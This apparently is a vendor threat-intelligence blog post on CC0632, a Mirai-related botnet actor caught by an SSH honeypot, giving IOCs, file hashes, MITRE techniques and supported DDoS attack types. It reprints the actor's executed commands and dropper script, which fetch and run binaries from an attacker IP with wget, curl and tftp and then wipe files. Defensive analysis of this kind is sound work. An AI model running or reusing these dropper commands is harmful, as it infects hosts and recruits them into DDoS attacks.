Blog  

Internet Noise: Threat Actor CC0632

Internet Noise: Threat Actor CC0632

Over the past year, our team has been working at gathering intel on new and unusual threat actors to augment the capabilities of our platform. Using our deception technology, we have detected several new threat actors in the wild that can be considered part of Internet noise (automated attacks that typically run constantly). We will be sharing the IOCs and TTPs of different threat actors we have uncovered, so be sure to check our blog weekly or follow us on LinkedIn for updates.

We gathered this intel by locating a decoy machine in a well-known provider, with an SSH port open to the outside network. We have found many attackers that approach the machine and try to access it, oftentimes with sheer brute force. By giving the machine a deliberately weak username and password, we were able to allow attackers an easy way in, after which we could observe their behaviors and TTPs. See some of the previous threat actors we’ve uncovered here.

Read on about the next CC we’ve found and are tracking: CC0632. This actor gains access using weak credentials. They install a script that works as a dropper to download a binary related to Mirai based on third-party AV companies. We detected a lot of connections to a certain IP address on port 55555, so we suspect that they could be connections to a C&C server.

CC0632
Attribution: Unknown
Risk: Medium
Target sectors: Any host
Overview: The goal of CC0632 is to install software and create connections to an external service on port 55555.

IOCs:

IP
205.185.126.121

FilenameFilepathSHA-256
8UsA.sh/tmp/8UsA.sh5c3edbe7dbdd8b39335734d4d0c21dceee8a910d5976dc194c16089d938742c6
gang123isgodloluaintgettingthesebinslikedammwtf.x86/tmp/gang123isgodloluaintgettingthesebinslikedammwtf.x867f5c3b718275add1107bf7aa1689cf3874ad895b62f01128816e9353cc5232fd
gang123isgodloluaintgettingthesebinslikedammwtf.mips/tmp/gang123isgodloluaintgettingthesebinslikedammwtf.mips3a88b6c0827446adfbde76e940aaddab261a77c007aa0de765366a2fc3746f31
gang123isgodloluaintgettingthesebinslikedammwtf.mpls/tmp/gang123isgodloluaintgettingthesebinslikedammwtf.mpls92d4e31ec1c2fbf94d92cc7b8de9f6623318e801395c4496ec1ad64b18b2ea61
gang123isgodloluaintgettingthesebinslikedammwtf.arm4/tmp/gang123isgodloluaintgettingthesebinslikedammwtf.arm488ddab2ec1ce28facfacbddab2eacbcec2941b71c67939daccddbbaddab29391
gang123isgodloluaintgettingthesebinslikedammwtf.arm5/tmp/gang123isgodloluaintgettingthesebinslikedammwtf.arm5091204e4d3eb63816ee7ac32c3d462c0ab28ccb0f6ffbe6a36bd03f88d4a65d4
gang123isgodloluaintgettingthesebinslikedammwtf.arm6/tmp/gang123isgodloluaintgettingthesebinslikedammwtf.arm6e86e53994e28f948ac58e562738db79ee66b70e8fe30b0dd4ae29290a4b2e6f9
gang123isgodloluaintgettingthesebinslikedammwtf.arm7/tmp/gang123isgodloluaintgettingthesebinslikedammwtf.arm79ddd4a39b22aacfadb195eac02868d1d357c3528d6e92e9d4f9a27b748a1b317
gang123isgodloluaintgettingthesebinslikedammwtf.ppc/tmp/gang123isgodloluaintgettingthesebinslikedammwtf.ppc0646845e159e7ce0c562959389dcc8d704cf3c85c34a585153cc75214540a9fc
gang123isgodloluaintgettingthesebinslikedammwtf.m8k/tmp/gang123isgodloluaintgettingthesebinslikedammwtf.m68k6309052cc775d8672410340bc6da780f2399007f924ea53507c169f4508a1be0
gang123isgodloluaintgettingthesebinslikedammwtf.sh4/tmp/gang123isgodloluaintgettingthesebinslikedammwtf.sh4102c387ef344413158aae46ec2941b27bd8686095dbf3f488b7c6cbab3b08420

Attack vectors:

CC0632 uses brute force attacks as its initial compromise method.

Once they obtain a valid authentication, they download a script called 8UsA.sh and execute it. This script acts as a dropper for a secondary binary, (gang123isgodloluaintgettingthesebinslikedammwtf) with the same name but with a different extension (files compiled for different architectures). This binary is classified as Mirai bot by third-party AV companies.

Then, it starts creating connections to the DDoS target.

This sample has a number of different attacks, all of them being classic network DDoS attacks:

UDP attacks: std, udpgeneric, udpvse, udpdns, udpplain.
TCP attacks: tcpsyn, tcpack, tcpstomp, tcpxmas.
GRE attacks: greip, greeth.

MITRE ATT&CK Techniques

Cataloguing the threat actor’s TTPs with MITRE ATT&CK’s matrix can help teams mitigate risk and stop attacks. These are the MITRE ATT&CK techniques that we observed in CC0632’s behavior:

MITRE ATT&CK PIC WITH MATCHED TTPs


Command and Scripting Interpreter - Unix Shell (T1059.004): attackers abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh…) depending on the specific distribution.

Standard Application Layer Protocol (T1071): attackers communicate using a common standardized application layer protocol such as HTTP, HTTPS, SMPT, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and the server.

Data Encoding (T1132): attackers encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system.

Indicator Removal on Host - File Deletion (T1070.004): attackers delete files left behind by the actions of their intrusion activity. Malware, tools. Or other non-native files dropped or created on a system by an adversary may leave traces to indicate what was done within a network and how.

Executed commands:

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/8UsA.sh; curl -O http://205.185.126.121/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 205.185.126.121 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 205.185.126.121; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *

8UsA.sh contents:

#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/bns/gang123isgodloluaintgettingthesebinslikedammwtf.x86; curl -O http://205.185.126.121/bns/gang123isgodloluaintgettingthesebinslikedammwtf.x86;cat gang123isgodloluaintgettingthesebinslikedammwtf.x86 >3AvA;chmod +x *;./3AvA x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/bns/gang123isgodloluaintgettingthesebinslikedammwtf.mips; curl -O http://205.185.126.121/bns/gang123isgodloluaintgettingthesebinslikedammwtf.mips;cat gang123isgodloluaintgettingthesebinslikedammwtf.mips >3AvA;chmod +x *;./3AvA mips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/bns/gang123isgodloluaintgettingthesebinslikedammwtf.mpsl; curl -O http://205.185.126.121/bns/gang123isgodloluaintgettingthesebinslikedammwtf.mpsl;cat gang123isgodloluaintgettingthesebinslikedammwtf.mpsl >3AvA;chmod +x *;./3AvA mpsl
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/bns/gang123isgodloluaintgettingthesebinslikedammwtf.arm4; curl -O http://205.185.126.121/bns/gang123isgodloluaintgettingthesebinslikedammwtf.arm4;cat gang123isgodloluaintgettingthesebinslikedammwtf.arm4 >3AvA;chmod +x *;./3AvA arm4
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/bns/gang123isgodloluaintgettingthesebinslikedammwtf.arm5; curl -O http://205.185.126.121/bns/gang123isgodloluaintgettingthesebinslikedammwtf.arm5;cat gang123isgodloluaintgettingthesebinslikedammwtf.arm5 >3AvA;chmod +x *;./3AvA arm5
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/bns/gang123isgodloluaintgettingthesebinslikedammwtf.arm6; curl -O http://205.185.126.121/bns/gang123isgodloluaintgettingthesebinslikedammwtf.arm6;cat gang123isgodloluaintgettingthesebinslikedammwtf.arm6 >3AvA;chmod +x *;./3AvA arm6
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/bns/gang123isgodloluaintgettingthesebinslikedammwtf.arm7; curl -O http://205.185.126.121/bns/gang123isgodloluaintgettingthesebinslikedammwtf.arm7;cat gang123isgodloluaintgettingthesebinslikedammwtf.arm7 >3AvA;chmod +x *;./3AvA arm7
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/bns/gang123isgodloluaintgettingthesebinslikedammwtf.ppc; curl -O http://205.185.126.121/bns/gang123isgodloluaintgettingthesebinslikedammwtf.ppc;cat gang123isgodloluaintgettingthesebinslikedammwtf.ppc >3AvA;chmod +x *;./3AvA ppc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/bns/gang123isgodloluaintgettingthesebinslikedammwtf.m68k; curl -O http://205.185.126.121/bns/gang123isgodloluaintgettingthesebinslikedammwtf.m68k;cat gang123isgodloluaintgettingthesebinslikedammwtf.m68k >3AvA;chmod +x *;./3AvA m68k
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/bns/gang123isgodloluaintgettingthesebinslikedammwtf.sh4; curl -O http://205.185.126.121/bns/gang123isgodloluaintgettingthesebinslikedammwtf.sh4;cat gang123isgodloluaintgettingthesebinslikedammwtf.sh4 >3AvA;chmod +x *;./3AvA sh4

We hope you find this threat intelligence relevant and timely. It allows us to update threat actor intel for our platform, so that all of our clients can benefit from the knowledge. This information can also be shared with red and blue teams so they know what malwares and attackers are compromising machines.

Next week we will present more unclassified threat actor findings so bookmark our blog or follow us on LinkedIn.

Follow these links to read about the previous threat actors we’ve uncovered using our deception-powered threat intel:

CC0628

CC0629

CC0630

Internet Noise: Threat Actor CC0632
New, real-time threat intel on threat actors we’ve discovered

Like Jim Morrison said, this is the end. But you can...